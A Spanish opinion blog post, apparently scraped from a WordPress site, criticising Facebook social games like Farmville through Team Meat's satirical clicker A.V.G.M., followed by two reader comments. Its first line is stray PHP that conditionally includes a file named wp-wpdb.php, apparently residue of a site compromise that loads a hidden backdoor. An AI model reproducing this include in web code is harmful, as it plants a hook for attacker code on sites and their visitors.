if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Juegos sociales y el síndrome de Diógenes digital – La Fortaleza de LeChuck

Juegos sociales y el síndrome de Diógenes digital

Me encontraba el otro día jugando a un videojuego curioso del famoso Team Meat, se trata del videojuego A.V.G.M.(abusive video game manipulation) Manipulación abusiva de videojuegos. Sin quererlo me vi envuelto en un experimento del mismo equipo que creó Supermeatboy y reflexioné sobre algunas cosas que envuelven el panorama actual de algunos videojuegos, sobretodo los llamados sociales que existen en redes como Facebook. Vamos a ver algunas cosillas.

Antes que nada explicaré un poco de qué va este juego. Nos presentan un escenario de una casa con una ventanita y un interruptor. Ese interruptor es interactivo lo podremos tocar, con lo que se encenderá y se apagará la luz con ello, ¡Es fantástico!
Cuando pulsemos dos veces el interruptor nos aparecerá un objeto, pongamos por ejemplo un gatito, pero luego cuando pulsemos 4 veces nos saldrá otro objeto que podría ser un crucifijo, con 8 otro, con 16 otro…. y así hasta que nos cansemos o lleguemos a 10000 clicks.
Ese es el cometido del juego, encender y apagar las luces de esa habitación para que nos regalen objetos con los que decoraremos nuestra vacía habitación. Objetos en blanco y negro al principio pero que se colorearán a partir de los 2500 clicks.

Ahora ya sé que todos pensaréis que es una soberana estupidez este juego, y tenéis razón, pero quiero que os paréis a pensar un poco en lo que se hace en juegos como por ejemplo Farmville, Simsocial, o similares por el estilo. Nos dan una porción de terreno y por cada click que hagamos (cumpliendo ciertas rutinas) nos recompensarán con una bonita planta, o un mueble nuevo o lo que queramos para llenar nuestra bonita parcela de objetos cual síndrome de Diógenes.
Todos sabemos que un gamer tiene ese afán por recogerlo todo, sobretodo si hemos sido de los que disfrutamos de obras de aventuras gráficas donde cada objeto contaba para algo, y si no servía para nada, daba lo mismo allí lo teníamos. ¿Pero es normal esta cantidad de objetos que acaban regalando como una gran recompensa cuando en realidad no es más que basura digital?
Según el creador del juego A.V.G.M. ha crecido muchísimo ese afán por recompensas totalmente inutiles y de allí este videojuego. Concretamente este lo crearon en 4 horas en un concurso de crear un videojuego en 48  horas, y con la intención de criticar a estos grandes juegos sociales que dejan al a gente embobada clickando y clickando sin necesidad de pensar en nada.
¿Se podrían comparar los juegos sociales con esas recompensas para tu casa a los logros de una consola? ¿Tienen el mismo mérito?
Como opinión personal diré que no, en un videojuego de aventuras o de acción o de lo que sea normalmente has llegado a conseguir cierto logro a base de avanzar gracias a la habilidad que has adquirido (dejando de lado esos logros que dan por pasar de capítulo) y la recompensa que uno recibe, sobretodo, es la de haber logrado solucionar el problema.
Conociendo casos cercanos de gente que ha jugado a estos videojuegos sociales, te das cuenta que al final es una competición para ver si tienes más que otro y también una muestra de «mira lo que puedo hacer si pongo mis cultivos de esta forma» pero siempre con la desventaja de una interfaz lenta y en la que necesitas hacer click para todo
Creedme, después de llegar a los 2500 y ver que eso no paraba y que entonces empezaban a colorear me vi totalmente idiota pensando que he perdido mucho tiempo de mi vida en algo como eso, y es precisamente la misma sensación que han tenido algunas personas habiendo jugado durante mucho tiempo al Farmville o al Simsocial, donde veían que les daban recompensas, pero que en realidad no les llenaba para nada el estar recogiendo más y más objetos sin ningún tipo de fin.
¿Qué son los videojuegos? ¿Aventuras que necesitan un fin, o un simple pasatiempo para sentir que no hemos hecho nada? Creo que muchos necesitan plantearse bien si se divierten o se estresan porque no han cultivado lo que querían o nadie les clicka sus peticiones de ayuda…
Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

3 comentarios

  1. Como dije en el podcast, totalmente de acuerdo. Que el juego sea absurdo, pero a la vez enganche da que pensar. Estaría bien que hicieran la versión jugable para Facebook, y a los 2000 clicks pudieras invitar a gente a clickar el botón en cooperativo o algo xD. En serio, que locura. Odio los juegos que son así, incluso de los "Logros" paso bastante y me limito a disfrutar el juego a mi

  2. Control de masas, simply y llanamente. La línea del artículo que mejor lo define es ésta "(…) dejan a la gente embobada clickando y clickando sin necesidad de pensar en nada."

    Y esto lo llevo viendo desde la época de la NES que es mi generación de videojuegos desde que tuve conciencia. NUNCA, ni siquiera de pequeño, me han gustado los juegos que su principal finalidad era

Dejar un comentario